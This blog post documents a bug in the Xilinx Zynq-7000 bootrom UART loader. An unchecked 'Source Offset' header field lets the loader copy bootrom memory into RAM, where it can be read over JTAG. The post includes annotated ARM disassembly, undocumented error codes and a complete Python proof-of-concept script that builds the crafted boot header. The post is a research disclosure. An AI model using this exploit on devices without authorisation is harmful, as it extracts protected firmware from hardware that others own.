This exploit has no security implications. Stop asking if it can bypass anything. It is just an easy way to grab the ROM.
The first time I wrote about this, it was just to document this feature from a usability perspective. There's a script up there that should "just work". I also lied a little - There is an interesting bug, and it may have been exactly why Xilinx didn't document it (update: nope, this was not why). That post is still accurate if you're just interested in the workings of the UART loader, however. Otherwise...
The Easy Way
The ROM is architected such that when the boot mode is selected, it first calls an initialization function for that interface, then it registers a callback for when the ROM needs more data.
The UART initialization routine sticks the entire payload in RAM - hardcoded in my ROM to 0x4_0000
.
For the UART loader's callback, it is pretty simple - here's the whole thing:
; void uart_callback(u32 r0_offset, void* r1_dest, i32 r2_nbytes)
ROM:0000A578 PUSH {R3,LR}
ROM:0000A57C MOV R3, #uart_buff ; 0x40000 in my rom
ROM:0000A584 MOV R12, #1
ROM:0000A588 LDR R3, [R3]
ROM:0000A58C MOVT R12, #7
ROM:0000A590 ADD R3, R3, R0 ; calculate source: (uart_buff + offset)
ROM:0000A594 CMP R3, R12 ; check upper source bound: (uart_buff + offset < 0x7_0001)
ROM:0000A598 BHI exit
ROM:0000A59C SUB R12, R3, #0x70000
ROM:0000A5A0 SUB LR, R12, #1
ROM:0000A5A4 ADD R0, LR, R2 ; R0 = (nbytes + offset + uart_buff) - 0x70001
ROM:0000A5A8 CMP R0, #0
ROM:0000A5AC RSBGT R2, R0, R2 ; nbytes
ROM:0000A5B0 MOV R0, R1 ; dst
ROM:0000A5B4 MOV R1, R3 ; src
ROM:0000A5B8 BL memcpy
ROM:0000A5BC
ROM:0000A5BC exit:
ROM:0000A5BC MOV R0, #0
ROM:0000A5C0 POP {R3,PC}
The intent of this routine is straightforward: Grab nbytes
from offset
bytes deep into the ROM image, and write them to dest
.
The RSBGT
weirdness at 0xa5ac
is a check for the span of the request (combined with the check at 0xa5a8
) , but is redundant and doesn't account for some wraparounds anyway.
The interesting part is the source address calculation: There is a check, but it is just for the upper bound, which we already know is constrained by earlier logic. Otherwise, it just adds our r0_offset
argument directly.
That's nice - if we fully control r0_offset
at any point where r1_dest
is something that persists after the ROM has locked itself down (which is kinda the whole idea of a bootrom...), we can stash stuff to look at later, as long as it lives below 0x70000
.
Aside: The same logic exists in both NOR and QSPI boot processes, with mildly fewer constrains. The UART is just a handier interface for iterating on something like this!
During a normal boot process, our callback is called a handful of times while processing the bootrom header (no TOCTOU, sorry: most stuff ends up being cached if relevant). Here are the important fields:
Zynq7000 bootrom header format |
The final call (in non-secureboot mode) is to just read the whole image, starting at the bootrom header field "Source Offset" - plus, if we're starting from a multiboot-capable image, that multiboot image base offset. UART isn't, so that is always 0.
"Source Offset" is relatively unique in that it is entirely unchecked, so...Since we completely control this 32-bit field, we can also completely control the result when a constant is added.
In this case, this allows us to arbitrarily read a reasonable amount (within normal image size limits) from any address under 0x70000
.
There's a script attached to exploit this - Run it, attach your favorite debugger and find the ROM readily in OCM RAM starting at 0 (mrd -bin -file whatever.bin 0 0x8000
will do the trick). The only bit that could not be determined by experimentation is the entry point I use (which is just a busy loop).
Obviously this is just a quality of life thing :)
Anyway, hope this is a little interesting, or provides a reason to be a little more careful about pointer math, or minimally gives everyone an easier way of getting at the ROM without copyright issues or glitching or (...tbd...).
Additional BootROM Error Codes
The Xilinx BootROM supplies error codes a couple ways - usually though blinking an LED on a well-known pin. The UART loader is unique in that they'll be spit right out over UART! Obviously these aren't among the documented codes, so here are my interpretations:
Error Code | Cause |
---|---|
0x2501 | Did not successfully completed the 'BAUD' handshake under 128 tries. |
0x2502 | Size (signed!) is > 0x30000. |
0x2503 | UART checksum error (*not* a boot header checksum). Set to 0 to bypass. |
0x200A | Occurs when there's a (bootrom header) checksum error in the image due to multiboot logic. |
(The signed size check is not an exploitable bug!)
Demo/PoC:
The exploit is pretty simple - It's little more than my UART loader script plus some magic values:
#!/bin/env python3
from struct import pack as p
from struct import unpack as up
import serial
import time
import sys
baudgen = 0x11
reg0 = 0x6
def chksum(data):
chk = 0
for d in data:
chk += d
chk &= 0xFFFF_FFFF
return chk
def hdrchksum(data):
chk = 0
for i in range(0, len(data), 4):
chk += up("<I", data[i:i+4])[0]
chk &= 0xFFFF_FFFF
return chk
def gen_hdr():
# xip ivt
hdr += p("<I", 0xeafffffe)
hdr += p("<I", 0xeafffffe)
hdr += p("<I", 0xeafffffe)
hdr += p("<I", 0xeafffffe)
hdr += p("<I", 0xeafffffe)
hdr += p("<I", 0xeafffffe)
hdr += p("<I", 0xeafffffe)
hdr += p("<I", 0xeafffffe)
# width detect
hdr += p("<I", 0xaa995566)
hdr += b'XNLX'
# encryption + misc
hdr += p("<II", 0, 0x01010000)
# :D ('source offset' - why yes, I'm like to boot the bootrom!)
hdr += p("<I", 0x1_0000_0000-0x40000)
# len
hdr += p("<I", 0x2_0000)
# load addr 0 or 0x4_0000 only...
hdr += p("<I", 0)
# entrypt (just a loop :))
hdr += p("<I", 0x0FCB4)
#"total image len" doesn't matter here
hdr += p("<I", 0x010014)
# QSPI something something
hdr += p("<I", 1)
# checksum
hdr += p("<I", 0xffff_ffff - hdrchksum(hdr[0x20:]))
# unused...
for _ in range(19):
hdr += p("<I", 0)
# not sure at allll:
hdr += p("<II", 0x8c0,0x8c0)
# init lists
for _ in range(0x100):
hdr += p("<II", 0xffff_ffff, 0)
return hdr
img = gen_hdr()
size = len(img)
checksum = chksum(img)
print("checksum: "+hex(checksum))
print("len: "+str(size))
ser = serial.Serial(timeout=0.5)
ser.port = "/dev/ttyUSB0"
ser.baudrate = 115200
ser.open()
while ser.read(1) != b'X':
continue
assert ser.read(8) == b'LNX-ZYNQ'
ser.write(b"BAUD")
ser.write(baudgen.to_bytes(4, 'little'))
ser.write(reg0.to_bytes(4, 'little'))
ser.write(size.to_bytes(4, 'little'))
ser.write(checksum.to_bytes(4, 'little'))
print("writing image...")
# sleep here 'cause this is where they hit resets for the tx/rx logic,
# and anything in-flight when that happens is lost (it happens a fair bit)
time.sleep(0.1)
print("wrote: " + str(ser.write(img)))
# let any error logic propagate..
time.sleep(0.1)
if ser.in_waiting == 0:
print("ok, i think we are done, ROM is 0x2_0000 bytes starting at 0 :)")
else:
print("something went wrong? bootrom says: " + str(ser.read(ser.in_waiting)))
first 16 instructions of the bootrom, via this script |
small addendum: if you have one of those cheap eBay Antminer boards (schematic here), the UART header is hooked up perfectly: you can select the correct mode by setting the two outermost jumpers toward the board edge, and the inner two the opposite direction.
additionally: it is possible to stash code based at 0x4_0000
. you cannot specify an entrypoint over 0x3_0000
, so it's not possible to jump directly into this code. you have a single jump with very minimal (non-existant, really) register control - is it possible to write the exploit such that it dumps the bootrom entirely over UART without the aid of JTAG or another boot device? I suspect so, but have not proved it out. You can be first - Happy Hacking!